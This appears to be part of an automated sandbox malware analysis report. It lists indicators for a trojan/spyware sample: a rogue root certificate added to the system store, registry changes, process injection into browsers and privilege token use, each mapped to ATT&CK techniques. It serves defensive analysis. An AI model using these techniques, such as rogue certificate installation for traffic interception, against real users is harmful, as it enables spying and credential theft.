Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 07b1f4f45712d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = f0d47a075812d701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = ba0e95075812d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = 70cf7a075812d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 010000004c6c303fde893d641e3daac951ffd792d42463a5527034d4cb5958c26139553e95c69494059be31ab6a9bef5d8d964c1f735671c8f5dce22a130459a2cd472d5a8956f362d4d3ac23833851d782b9cd7367a9e00f74fb60fe950	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Setup.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Setup.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

3296 regedit.exe
7600 regedit.exe
Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

5260 PING.EXE
4488 PING.EXE
2292 PING.EXE
2068 PING.EXE
96 PING.EXE

pid	process
3296	regedit.exe
7600	regedit.exe

pid	process
5260	PING.EXE
4488	PING.EXE
2292	PING.EXE
2068	PING.EXE
96	PING.EXE

Script User-Agent 6 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	742	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	415	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	434	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	531	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	614	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	693	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

1615014383700.exe1615014388341.exe1615014393950.exe23E04C4F32EF2158.tmpseed.exe

pid	process
3828	1615014383700.exe
3828	1615014383700.exe
968	1615014388341.exe
968	1615014388341.exe
1320	1615014393950.exe
1320	1615014393950.exe
1124	23E04C4F32EF2158.tmp
1124	23E04C4F32EF2158.tmp
3564	seed.exe
3564	seed.exe
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

MicrosoftEdgeCP.exeseed.exe

pid process

1948 MicrosoftEdgeCP.exe
3564 seed.exe

pid	process
1948	MicrosoftEdgeCP.exe
3564	seed.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exe

description	pid	process
Token: SeShutdownPrivilege	2412	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2412	msiexec.exe
Token: SeSecurityPrivilege	1016	msiexec.exe
Token: SeCreateTokenPrivilege	2412	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2412	msiexec.exe
Token: SeLockMemoryPrivilege	2412	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2412	msiexec.exe
Token: SeMachineAccountPrivilege	2412	msiexec.exe
Token: SeTcbPrivilege	2412	msiexec.exe
Token: SeSecurityPrivilege	2412	msiexec.exe
Token: SeTakeOwnershipPrivilege	2412	msiexec.exe
Token: SeLoadDriverPrivilege	2412	msiexec.exe
Token: SeSystemProfilePrivilege	2412	msiexec.exe
Token: SeSystemtimePrivilege	2412	msiexec.exe
Token: SeProfSingleProcessPrivilege	2412	msiexec.exe
Token: SeIncBasePriorityPrivilege	2412	msiexec.exe
Token: SeCreatePagefilePrivilege	2412	msiexec.exe
Token: SeCreatePermanentPrivilege	2412	msiexec.exe
Token: SeBackupPrivilege	2412	msiexec.exe
Token: SeRestorePrivilege	2412	msiexec.exe
Token: SeShutdownPrivilege	2412	msiexec.exe
Token: SeDebugPrivilege	2412	msiexec.exe
Token: SeAuditPrivilege	2412	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2412	msiexec.exe
Token: SeChangeNotifyPrivilege	2412	msiexec.exe
Token: SeRemoteShutdownPrivilege	2412	msiexec.exe
Token: SeUndockPrivilege	2412	msiexec.exe
Token: SeSyncAgentPrivilege	2412	msiexec.exe
Token: SeEnableDelegationPrivilege	2412	msiexec.exe
Token: SeManageVolumePrivilege	2412	msiexec.exe
Token: SeImpersonatePrivilege	2412	msiexec.exe
Token: SeCreateGlobalPrivilege	2412	msiexec.exe
Token: SeCreateTokenPrivilege	2412	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2412	msiexec.exe
Token: SeLockMemoryPrivilege	2412	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2412	msiexec.exe
Token: SeMachineAccountPrivilege	2412	msiexec.exe
Token: SeTcbPrivilege	2412	msiexec.exe
Token: SeSecurityPrivilege	2412	msiexec.exe
Token: SeTakeOwnershipPrivilege	2412	msiexec.exe
Token: SeLoadDriverPrivilege	2412	msiexec.exe
Token: SeSystemProfilePrivilege	2412	msiexec.exe
Token: SeSystemtimePrivilege	2412	msiexec.exe
Token: SeProfSingleProcessPrivilege	2412	msiexec.exe
Token: SeIncBasePriorityPrivilege	2412	msiexec.exe
Token: SeCreatePagefilePrivilege	2412	msiexec.exe
Token: SeCreatePermanentPrivilege	2412	msiexec.exe
Token: SeBackupPrivilege	2412	msiexec.exe
Token: SeRestorePrivilege	2412	msiexec.exe
Token: SeShutdownPrivilege	2412	msiexec.exe
Token: SeDebugPrivilege	2412	msiexec.exe
Token: SeAuditPrivilege	2412	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2412	msiexec.exe
Token: SeChangeNotifyPrivilege	2412	msiexec.exe
Token: SeRemoteShutdownPrivilege	2412	msiexec.exe
Token: SeUndockPrivilege	2412	msiexec.exe
Token: SeSyncAgentPrivilege	2412	msiexec.exe
Token: SeEnableDelegationPrivilege	2412	msiexec.exe
Token: SeManageVolumePrivilege	2412	msiexec.exe
Token: SeImpersonatePrivilege	2412	msiexec.exe
Token: SeCreateGlobalPrivilege	2412	msiexec.exe
Token: SeCreateTokenPrivilege	2412	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2412	msiexec.exe
Token: SeLockMemoryPrivilege	2412	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

msiexec.exe23E04C4F32EF2158.tmp

pid process

2412 msiexec.exe
1124 23E04C4F32EF2158.tmp
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exe

pid process

2076 MicrosoftEdge.exe
1948 MicrosoftEdgeCP.exe
1948 MicrosoftEdgeCP.exe

pid	process
2412	msiexec.exe
1124	23E04C4F32EF2158.tmp

pid	process
2076	MicrosoftEdge.exe
1948	MicrosoftEdgeCP.exe
1948	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup.exemsiexec.execmd.exeC0CA61A12E4C8B38.exeC0CA61A12E4C8B38.execmd.execmd.exe

description	pid	process	target process
PID 1316 wrote to memory of 2412	1316	Setup.exe	msiexec.exe
PID 1316 wrote to memory of 2412	1316	Setup.exe	msiexec.exe
PID 1316 wrote to memory of 2412	1316	Setup.exe	msiexec.exe
PID 1016 wrote to memory of 4048	1016	msiexec.exe	MsiExec.exe
PID 1016 wrote to memory of 4048	1016	msiexec.exe	MsiExec.exe
PID 1016 wrote to memory of 4048	1016	msiexec.exe	MsiExec.exe
PID 1316 wrote to memory of 560	1316	Setup.exe	C0CA61A12E4C8B38.exe
PID 1316 wrote to memory of 560	1316	Setup.exe	C0CA61A12E4C8B38.exe
PID 1316 wrote to memory of 560	1316	Setup.exe	C0CA61A12E4C8B38.exe
PID 1316 wrote to memory of 912	1316	Setup.exe	C0CA61A12E4C8B38.exe
PID 1316 wrote to memory of 912	1316	Setup.exe	C0CA61A12E4C8B38.exe
PID 1316 wrote to memory of 912	1316	Setup.exe	C0CA61A12E4C8B38.exe
PID 1316 wrote to memory of 500	1316	Setup.exe	cmd.exe
PID 1316 wrote to memory of 500	1316	Setup.exe	cmd.exe
PID 1316 wrote to memory of 500	1316	Setup.exe	cmd.exe
PID 500 wrote to memory of 2292	500	cmd.exe	PING.EXE
PID 500 wrote to memory of 2292	500	cmd.exe	PING.EXE
PID 500 wrote to memory of 2292	500	cmd.exe	PING.EXE
PID 912 wrote to memory of 2152	912	C0CA61A12E4C8B38.exe	cmd.exe
PID 912 wrote to memory of 2152	912	C0CA61A12E4C8B38.exe	cmd.exe
PID 912 wrote to memory of 2152	912	C0CA61A12E4C8B38.exe	cmd.exe
PID 560 wrote to memory of 3268	560	C0CA61A12E4C8B38.exe	firefox.exe
PID 560 wrote to memory of 3268	560	C0CA61A12E4C8B38.exe	firefox.exe
PID 560 wrote to memory of 3268	560	C0CA61A12E4C8B38.exe	firefox.exe
PID 560 wrote to memory of 3268	560	C0CA61A12E4C8B38.exe	firefox.exe
PID 560 wrote to memory of 3268	560	C0CA61A12E4C8B38.exe	firefox.exe
PID 560 wrote to memory of 3268	560	C0CA61A12E4C8B38.exe	firefox.exe
PID 2152 wrote to memory of 1904	2152	cmd.exe	taskkill.exe
PID 2152 wrote to memory of 1904	2152	cmd.exe	taskkill.exe
PID 2152 wrote to memory of 1904	2152	cmd.exe	taskkill.exe
PID 560 wrote to memory of 3828	560	C0CA61A12E4C8B38.exe	1615014383700.exe
PID 560 wrote to memory of 3828	560	C0CA61A12E4C8B38.exe	1615014383700.exe
PID 560 wrote to memory of 3828	560	C0CA61A12E4C8B38.exe	1615014383700.exe
PID 912 wrote to memory of 1456	912	C0CA61A12E4C8B38.exe	cmd.exe
PID 912 wrote to memory of 1456	912	C0CA61A12E4C8B38.exe	cmd.exe
PID 912 wrote to memory of 1456	912	C0CA61A12E4C8B38.exe	cmd.exe
PID 1456 wrote to memory of 2068	1456	cmd.exe	PING.EXE
PID 1456 wrote to memory of 2068	1456	cmd.exe	PING.EXE
PID 1456 wrote to memory of 2068	1456	cmd.exe	PING.EXE
PID 560 wrote to memory of 3672	560	C0CA61A12E4C8B38.exe	firefox.exe
PID 560 wrote to memory of 3672	560	C0CA61A12E4C8B38.exe	firefox.exe
PID 560 wrote to memory of 3672	560	C0CA61A12E4C8B38.exe	firefox.exe
PID 560 wrote to memory of 3672	560	C0CA61A12E4C8B38.exe	firefox.exe
PID 560 wrote to memory of 3672	560	C0CA61A12E4C8B38.exe	firefox.exe
PID 560 wrote to memory of 3672	560	C0CA61A12E4C8B38.exe	firefox.exe
PID 560 wrote to memory of 968	560	C0CA61A12E4C8B38.exe	1615014388341.exe
PID 560 wrote to memory of 968	560	C0CA61A12E4C8B38.exe	1615014388341.exe
PID 560 wrote to memory of 968	560	C0CA61A12E4C8B38.exe	1615014388341.exe
PID 560 wrote to memory of 2036	560	C0CA61A12E4C8B38.exe	firefox.exe
PID 560 wrote to memory of 2036	560	C0CA61A12E4C8B38.exe	firefox.exe
PID 560 wrote to memory of 2036	560	C0CA61A12E4C8B38.exe	firefox.exe
PID 560 wrote to memory of 2036	560	C0CA61A12E4C8B38.exe	firefox.exe
PID 560 wrote to memory of 2036	560	C0CA61A12E4C8B38.exe	firefox.exe
PID 560 wrote to memory of 2036	560	C0CA61A12E4C8B38.exe	firefox.exe
PID 560 wrote to memory of 1320	560	C0CA61A12E4C8B38.exe	1615014393950.exe
PID 560 wrote to memory of 1320	560	C0CA61A12E4C8B38.exe	1615014393950.exe
